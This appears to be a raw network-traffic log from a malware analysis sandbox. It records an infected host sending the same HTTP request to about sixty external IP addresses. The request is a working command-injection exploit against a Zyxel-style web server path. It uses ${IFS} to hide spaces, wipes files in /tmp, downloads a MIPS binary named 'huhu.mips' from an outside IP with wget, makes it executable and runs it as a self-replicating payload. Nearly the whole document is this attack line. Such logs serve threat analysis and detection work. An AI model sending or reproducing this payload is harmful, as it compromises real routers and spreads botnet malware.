                                                      Feb 2, 2024 06:36:01.817337036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6525192.168.2.143626495.23.185.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.817378998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6526192.168.2.1438506124.147.70.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.817435980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6527192.168.2.1444178124.182.6.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.817522049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6528192.168.2.1441558115.155.105.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.817557096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6529192.168.2.1437180221.212.204.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.817584991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6530192.168.2.1443304205.226.50.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.817632914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6531192.168.2.144512468.207.178.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.817688942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6532192.168.2.14505009.229.99.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.817714930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6533192.168.2.1438798108.237.43.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.817774057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6534192.168.2.1438216219.62.12.56443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.817804098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6535192.168.2.145623871.187.207.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.817830086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6536192.168.2.1442864108.226.238.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.817873001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6537192.168.2.145229049.242.141.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.817924023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6538192.168.2.1457000103.61.224.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.817987919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6539192.168.2.1434646178.255.56.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.818012953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6540192.168.2.145645659.137.24.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.818046093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6541192.168.2.1448474176.184.124.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.818103075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6542192.168.2.144716872.75.176.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.818136930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6543192.168.2.1450738110.153.98.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.818200111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6544192.168.2.146076898.77.59.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.818233967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6545192.168.2.1457388109.161.232.241443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.818269014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6546192.168.2.1451352153.63.173.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.818309069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6547192.168.2.1447568105.116.213.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.818351984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6548192.168.2.144872683.22.184.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.818392992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6549192.168.2.1433302178.127.110.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.818429947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6550192.168.2.1434320141.68.178.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.818459034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6551192.168.2.1443642197.173.70.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.818517923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6552192.168.2.1446498139.228.175.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.818571091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6553192.168.2.144881489.109.236.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.818623066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6554192.168.2.1450182102.142.210.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.818672895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6555192.168.2.145974442.24.245.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.818716049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6556192.168.2.143725227.102.206.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.818767071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6557192.168.2.143924083.140.27.20443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.818806887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6558192.168.2.144759081.52.108.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.818857908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6559192.168.2.144923482.212.71.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.818902016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6560192.168.2.1438906175.99.3.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.818933010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6561192.168.2.143471441.39.151.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.818979025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6562192.168.2.144315286.194.182.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.819021940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6563192.168.2.1445320222.187.228.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.819061995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6564192.168.2.144853284.57.25.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.819113016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6565192.168.2.144325885.87.59.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.819144011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6566192.168.2.144337862.142.215.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.819189072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6567192.168.2.1443724194.121.67.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.819230080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6568192.168.2.1445228108.205.140.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.819257021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6569192.168.2.1445762118.150.63.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.819315910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6570192.168.2.1454804108.106.218.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.819360018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6571192.168.2.1459140187.255.134.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.819405079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6572192.168.2.145170658.116.121.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.819425106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6573192.168.2.1446174219.37.57.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.819468975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6574192.168.2.143618042.101.5.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.819518089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6575192.168.2.144457637.138.74.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.819550037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6576192.168.2.1434074161.68.242.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.819603920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6577192.168.2.1434866189.176.44.204443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.819628954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6578192.168.2.145236619.111.77.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.819645882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6579192.168.2.1437216171.208.156.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.819679022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6580192.168.2.1441318166.141.40.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.819730997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6581192.168.2.144088096.14.156.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.819758892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6582192.168.2.143323623.23.231.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.819808960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6583192.168.2.1434774119.32.224.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.819817066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6584192.168.2.1457416201.51.30.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.819870949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6585192.168.2.1459442114.188.255.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.819885969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6586192.168.2.143793095.46.188.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.819947958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6587192.168.2.1434976218.155.242.243443
                                                      TimestampBytes transferredDirectionData
